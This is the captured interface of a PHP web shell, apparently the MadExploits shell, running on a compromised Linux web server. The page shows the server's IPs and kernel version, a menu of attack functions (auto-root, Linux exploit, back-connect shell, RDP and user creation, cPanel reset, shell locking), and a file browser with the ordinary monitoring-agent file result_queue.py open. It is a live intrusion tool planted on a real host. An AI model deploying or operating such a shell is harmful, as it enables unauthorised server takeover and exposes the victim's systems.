Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.117.103.185
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
fm-agent /
library /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
agent.py
96.8
KB
-rw-r--r--
agent_exceptions.py
110
B
-rw-r--r--
agent_util.py
8.58
KB
-rw-r--r--
aggregator.py
14.89
KB
-rw-r--r--
anomaly.py
2.19
KB
-rw-r--r--
blacklister.py
809
B
-rw-r--r--
container_discovery.py
3.3
KB
-rw-r--r--
display.py
2.06
KB
-rw-r--r--
forticlient_helper.py
2.59
KB
-rw-r--r--
inspector.py
15.7
KB
-rw-r--r--
iperf3.py
2.12
KB
-rw-r--r--
log_matcher.py
4.27
KB
-rw-r--r--
maintenance.py
3.61
KB
-rw-r--r--
pickle_database.py
1.28
KB
-rw-r--r--
plugin_driver.py
4.78
KB
-rw-r--r--
plugin_manager.py
11.04
KB
-rw-r--r--
process_manager.py
851
B
-rw-r--r--
progress_printer.py
837
B
-rw-r--r--
result_queue.py
1.99
KB
-rw-r--r--
schedule.py
3.19
KB
-rw-r--r--
threshold.py
1.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : result_queue.py
class ResultQueue(object): """ If the aggregator can't be reached for some reason, we want to still keep calculating results and store them locally until we can reach the agg again.""" # Variables for ResultQueue #QUEUE_MAX_RESULTS = 150000 # We put results in a queue if aggregator can't be reached. #QUEUE_BATCH_SIZE = 10000 # How many queue results we send back to the aggregator at once def __init__(self, queue_max_results=None, queue_batch_size=None): self.data = [] self.queue_max_results = queue_max_results if self.queue_max_results is None: self.queue_max_results = 150000 self.queue_batch_size = queue_batch_size if self.queue_batch_size is None: self.queue_batch_size = 10000 def pop(self): # remove the oldest results first self.data.pop(0) # Pop only the most recent result def pop_latest(self): self.data.pop() def pop_results(self, chunk=None): if chunk is None: chunk = self.queue_batch_size # Pop and return 'chunk' of the newest items if len(self.data) <= chunk: result = self.data self.data = [] else: x = len(self.data) - chunk result = self.data[x:] self.data = self.data[:x] return result def push(self, result): if len(self.data) == self.queue_max_results: self.pop() self.data.append(result) def update(self, results): if len(results) + len(self.data) <= self.queue_max_results: self.data.extend(results) else: # Make room so we stay under QUEUE_MAX_RESULTS free_space = self.queue_max_results - len(self.data) removal = len(results) - free_space self.data = self.data[removal:] self.data.extend(results) def isEmpty(self): return len(self.data) == 0 def queueLength(self): return len(self.data)
Close